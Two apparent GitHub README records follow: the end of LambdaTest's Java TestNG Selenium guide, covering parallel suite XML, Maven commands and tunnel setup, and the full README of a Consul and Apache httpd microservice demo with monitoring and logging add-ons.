<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE suite SYSTEM "http://testng.org/testng-1.0.dtd">
<suite thread-count="3" name="LambdaTestSuite" parallel="tests">
  <test name="WIN8TEST">
    <parameter name="browser" value="firefox"/>
    <parameter name="version" value="62.0"/>
    <parameter name="platform" value="WIN8"/>
    <classes>
      <class name="LambdaTest.TestNGToDo"/>
    </classes>
  </test> <!-- Test -->
  <test name="WIN10TEST">
    <parameter name="browser" value="chrome"/>
    <parameter name="version" value="79.0"/>
    <parameter name="platform" value="WIN10"/>
    <classes>
      <class name="LambdaTest.TestNGToDo"/>
    </classes>
  </test> <!-- Test -->
  <test name="MACTEST">
    <parameter name="browser" value="safari"/>
    <parameter name="version" value="11.0"/>
    <parameter name="platform" value="macos 10.13"/>
    <classes>
      <class name="LambdaTest.TestNGToDo"/>
    </classes>
  </test> <!-- Test -->
</suite>
```

### Executing Parallel Tests Using TestNG

To run parallel tests using **TestNG**, execute the commands below in the terminal:

- For the above example code

```bash
mvn test
```

- For the cloned Java-TestNG-Selenium repo used to run our first sample test

```bash
mvn test -D suite=parallel.xml
```

## Testing Locally Hosted Or Privately Hosted Projects

You can test your locally hosted or privately hosted projects on the LambdaTest Selenium grid using LambdaTest Tunnel. All you have to do is set up an SSH tunnel using the tunnel binary and pass the toggle `tunnel = true` via desired capabilities. LambdaTest Tunnel establishes a secure SSH-protocol-based tunnel that allows you to test your locally hosted or privately hosted pages, even before they are live.
Refer our [LambdaTest Tunnel documentation](https://www.lambdatest.com/support/docs/testing-locally-hosted-pages/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) for more information. Here’s how you can establish LambdaTest Tunnel. Download the binary file of: * [LambdaTest Tunnel for Windows](https://downloads.lambdatest.com/tunnel/v3/windows/64bit/LT_Windows.zip) * [LambdaTest Tunnel for macOS](https://downloads.lambdatest.com/tunnel/v3/mac/64bit/LT_Mac.zip) * [LambdaTest Tunnel for Linux](https://downloads.lambdatest.com/tunnel/v3/linux/64bit/LT_Linux.zip) Open command prompt and navigate to the binary folder. Run the following command: ```bash LT -user {user’s login email} -key {user’s access key} ``` So if your user name is lambdatest@example.com and key is 123456, the command would be: ```bash LT -user lambdatest@example.com -key 123456 ``` Once you are able to connect **LambdaTest Tunnel** successfully, you would just have to pass on tunnel capabilities in the code shown below : **Tunnel Capability** ```java DesiredCapabilities capabilities = new DesiredCapabilities(); capabilities.setCapability("tunnel", true); ``` ## Tutorials 📙 Check out our latest tutorials on TestNG automation testing 👇 * [JUnit 5 vs TestNG: Choosing the Right Framework for Automation Testing](https://www.lambdatest.com/blog/junit-5-vs-testng/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How To Install TestNG?](https://www.lambdatest.com/blog/how-to-install-testng-in-eclipse-step-by-step-guide/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [Create TestNG Project in Eclipse & Run Selenium Test Script](https://www.lambdatest.com/blog/create-testng-project-in-eclipse-run-selenium-test-script/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [A Complete Guide for Your First TestNG Automation 
Script](https://www.lambdatest.com/blog/a-complete-guide-for-your-first-testng-automation-script/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Automate using TestNG in Selenium?](https://www.lambdatest.com/blog/testng-in-selenium/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Perform Parallel Test Execution in TestNG with Selenium](https://www.lambdatest.com/blog/parallel-test-execution-in-testng/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [Creating TestNG XML File & Execute Parallel Testing](https://www.lambdatest.com/blog/create-testng-xml-file-execute-parallel-testing/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [Speed Up Automated Parallel Testing in Selenium with TestNG](https://www.lambdatest.com/blog/speed-up-automated-parallel-testing-in-selenium-with-testng/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [Automation Testing With Selenium, Cucumber & TestNG](https://www.lambdatest.com/blog/automation-testing-with-selenium-cucumber-testng/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Run JUnit Selenium Tests using TestNG](https://www.lambdatest.com/blog/test-example-junit-and-testng-in-selenium/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Group Test Cases in TestNG [With Examples]](https://www.lambdatest.com/blog/grouping-test-cases-in-testng/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Set Test Case Priority in TestNG with Selenium](https://www.lambdatest.com/blog/prioritizing-tests-in-testng-with-selenium/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Use Assertions in TestNG with Selenium](https://www.lambdatest.com/blog/asserts-in-testng/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Use DataProviders in TestNG [With 
Examples]](https://www.lambdatest.com/blog/how-to-use-dataproviders-in-testng-with-examples/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [Parameterization in TestNG - DataProvider and TestNG XML [With Examples]](https://www.lambdatest.com/blog/parameterization-in-testng-dataprovider-and-testng-xml-examples/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [TestNG Listeners in Selenium WebDriver [With Examples]](https://www.lambdatest.com/blog/testng-listeners-in-selenium-webdriver-with-examples/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [TestNG Annotations Tutorial with Examples for Selenium Automation](https://www.lambdatest.com/blog/complete-guide-on-testng-annotations-for-selenium-webdriver/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Use TestNG Reporter Log in Selenium](https://www.lambdatest.com/blog/how-to-use-testng-reporter-log-in-selenium/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Generate TestNG Reports in Jenkins](https://www.lambdatest.com/blog/how-to-generate-testng-reports-in-jenkins/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) ## Documentation & Resources :books: Visit the following links to learn more about LambdaTest's features, setup and tutorials around test automation, mobile app testing, responsive testing, and manual testing. 
* [LambdaTest Documentation](https://www.lambdatest.com/support/docs/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium)
* [LambdaTest Blog](https://www.lambdatest.com/blog/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium)
* [LambdaTest Learning Hub](https://www.lambdatest.com/learning-hub/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium)

## LambdaTest Community :busts_in_silhouette:

The [LambdaTest Community](https://community.lambdatest.com/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) allows people to interact with tech enthusiasts. Connect, ask questions, and learn from tech-savvy people. Discuss best practices in web development, testing, and DevOps with professionals from across the globe 🌎

## What's New At LambdaTest ❓

To stay updated with the latest features and product add-ons, visit the [Changelog](https://changelog.lambdatest.com)

## About LambdaTest

[LambdaTest](https://www.lambdatest.com/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) is a leading test execution and orchestration platform that is fast, reliable, scalable, and secure. It allows users to run both manual and automated tests of web and mobile apps across 3000+ browser, operating system, and real device combinations. Using LambdaTest, businesses can ensure quicker developer feedback and hence achieve a faster go-to-market. Over 500 enterprises and 1 million+ users across 130+ countries rely on LambdaTest for their testing needs.

### Features

* Run Selenium, Cypress, Puppeteer, Playwright, and Appium automation tests across 3000+ real desktop and mobile environments.
* Real-time cross-browser testing on 3000+ environments.
* Test on a real device cloud
* Blazing-fast test automation with HyperExecute
* Accelerate testing, shorten job times, and get faster feedback on code changes with Test At Scale.
* Smart Visual Regression Testing on cloud
* 120+ third-party integrations with your favorite tools for CI/CD, project management, codeless automation, and more.
* Automated screenshot testing across multiple browsers in a single click.
* Local testing of web and mobile apps.
* Online accessibility testing across 3000+ desktop and mobile browsers, browser versions, and operating systems.
* Geolocation testing of web and mobile apps across 53+ countries.
* LT Browser - for responsive testing across 50+ pre-installed mobile, tablet, desktop, and laptop viewports

[<img height="58" width="200" src="https://user-images.githubusercontent.com/70570645/171866795-52c11b49-0728-4229-b073-4b704209ddde.png">](https://accounts.lambdatest.com/register?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium)

## We are here to help you :headphones:

* Got a query? We are available 24x7 to help. [Contact Us](mailto:support@lambdatest.com)
* For more info, visit - [LambdaTest](https://www.lambdatest.com?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium)
1
ewolff/microservice-consul
Sample of a Microservice setup for my book ported to Consul / Apache httpd. Based on Spring Cloud / Netflix / Java / Docker / Docker Compose / Docker Machine
null
Microservice Consul Sample
===================

[Deutsche Anleitung zum Starten des Beispiels](WIE-LAUFEN.md)

This sample is like the sample for my Microservices Book ([English](http://microservices-book.com/) / [German](http://microservices-buch.de/)) that you can find at https://github.com/ewolff/microservice. However, this demo uses [Hashicorp Consul](https://www.consul.io) for service discovery, and Apache httpd as a reverse proxy to route calls to the services and as a load balancer.

This project creates a complete microservice demo system in Docker containers. The services are implemented in Java using Spring and Spring Cloud.

It uses three microservices:

- `Order` to process orders (http://localhost:8080 when started locally)
- `Customer` to handle customer data (http://localhost:8080)
- `Catalog` to handle the items in the catalog (http://localhost:8080)

Consul
------

Consul has a web UI. You can access it at port 8500 of your Docker host. The homepage at port 8080 also contains a link to the Consul UI.

You can also use Consul's DNS interface, e.g. with dig:

```
dig @192.168.99.100 -p 8600 order.service.consul.
dig @192.168.99.100 -p 8600 order.service.consul. ANY
dig @192.168.99.100 -p 8600 order.service.consul. SRV
```

Note that the demo uses the original [Consul Docker image](https://hub.docker.com/_/consul/) provided by Hashicorp. However, the demo does not use a Consul cluster and only stores the data in memory, i.e. it is certainly not fit for production.

All the Spring Cloud microservices (customer, catalog and order) register themselves with the Consul server. An alternative approach to registering the services is [Registrator](https://github.com/gliderlabs/registrator). An alternative to using Apache httpd as a load balancer would e.g. be [Fabio](https://github.com/eBay/fabio).

Apache HTTP Load Balancer
------------------------

Apache httpd is used to provide the web page of the demo at port 8080.
It also forwards HTTP requests to the microservices, whose ports are not exposed! Apache httpd is configured as a reverse proxy for this - and as a load balancer, i.e. if you start multiple instances of a microservice, e.g. via `docker-compose scale catalog=2`, Apache will recognize the new instance.

To configure this, Apache httpd needs to get all registered services from Consul. [Consul Template](https://github.com/hashicorp/consul-template) is used for this. It uses a template for the Apache httpd configuration and fills in the IP addresses of the registered services. The Docker container therefore runs two processes: Apache httpd and Consul Template. Consul Template starts Apache httpd and also restarts it when new services are registered in the Consul server. Please refer to the subdirectory `apache` to see how this works.

Prometheus
----------

[Prometheus](https://prometheus.io/) is a monitoring system. The code of the [microservice-consul-demo-order](microservice-consul-demo/microservice-consul-demo-order) project includes code to export metrics to Prometheus in `com.ewolff.microservice.order.prometheus`. Also, the docker-compose configuration in `docker-compose-prometheus.yml` includes a Prometheus instance. It will listen on port 9090 on the Docker host, so you can monitor the application. Run it with `docker-compose -f docker-compose-prometheus.yml up -d`.

Elastic Stack
-----------

The [Elastic Stack](https://www.elastic.co/de/products) provides a set of tools to handle log data. The projects contain a Logback configuration in `logback-spring.xml` so that the services log JSON-formatted data. The docker-compose configuration in `docker-compose-elastic.yml` includes

* Filebeat to ship the logs from a common volume to Elasticsearch.
* Elasticsearch to store and analyse the logs.
* Kibana to analyse the logs. You can access it on port 5601, e.g. at <http://localhost:5601>. The indices are called `filebeat-*`.
You can run the configuration with `docker-compose -f docker-compose-elastic.yml up -d`.

Zipkin
-----

[Zipkin](http://zipkin.io/) is a tool to trace calls across microservices. The project includes all necessary libraries to provide traces. The docker-compose configuration in `docker-compose-zipkin.yml` includes

* A Zipkin server to store and display the data. You can access it on port 9411, e.g. at <http://localhost:9411>.
* Microservices configured to provide trace information.

You can run the configuration with `docker-compose -f docker-compose-zipkin.yml up -d`.

Technologies
------------

- Consul for lookup/discovery
- Apache httpd as a reverse proxy to route calls to the appropriate microservice
- [Ribbon](https://github.com/netflix/Ribbon) for client-side load balancing. See the classes `CatalogClient` and `CustomerClient` in the package `com.ewolff.microservice.order.clients` in the [microservice-demo-order](https://github.com/innoq/microservice-consul/tree/master/microservice-consul-demo/microservice-consul-demo-order) project.

How To Run
----------

The demo can be run with [Docker Machine and Docker Compose](docker/README.md) via `docker-compose up`. See [How to run](HOW-TO-RUN.md) for details.

Remarks on the Code
-------------------

The servers for the infrastructure components are pretty simple thanks to Spring Cloud.

The microservices are:

- [microservice-consul-demo-catalog](microservice-consul-demo/microservice-consul-demo-catalog) is the application to take care of items.
- [microservice-consul-demo-customer](microservice-consul-demo/microservice-consul-demo-customer) is responsible for customers.
- [microservice-consul-demo-order](microservice-consul-demo/microservice-consul-demo-order) does order processing. It uses microservice-demo-catalog and microservice-demo-customer. Ribbon is used for load balancing.

The microservices have a Java main application in `src/test/java` to run them stand-alone.
`microservice-demo-order` then uses stubs for the other services. There are also tests that use _consumer-driven contracts_, which ensure that the services provide the correct interfaces. These CDC tests are used in microservice-demo-order to verify the stubs. In `microservice-demo-customer` and `microservice-demo-catalog` they are used to verify the implemented REST services.
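The Consul Template mechanism described in the Apache HTTP Load Balancer section renders the registered service instances into the httpd configuration. A hypothetical `.ctmpl` fragment could look like the following; the real template lives in the `apache` subdirectory and will differ in detail:

```
# Illustrative consul-template fragment for an Apache balancer.
# {{ range service "order" }} iterates over all healthy "order"
# instances registered in Consul, exposing .Address and .Port.
<Proxy balancer://order>
{{ range service "order" }}  BalancerMember http://{{ .Address }}:{{ .Port }}
{{ end }}</Proxy>

ProxyPass /order balancer://order
```

Each time an instance is registered or deregistered, Consul Template re-renders this file and restarts httpd, which is how `docker-compose scale catalog=2` results in the new instance receiving traffic.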
1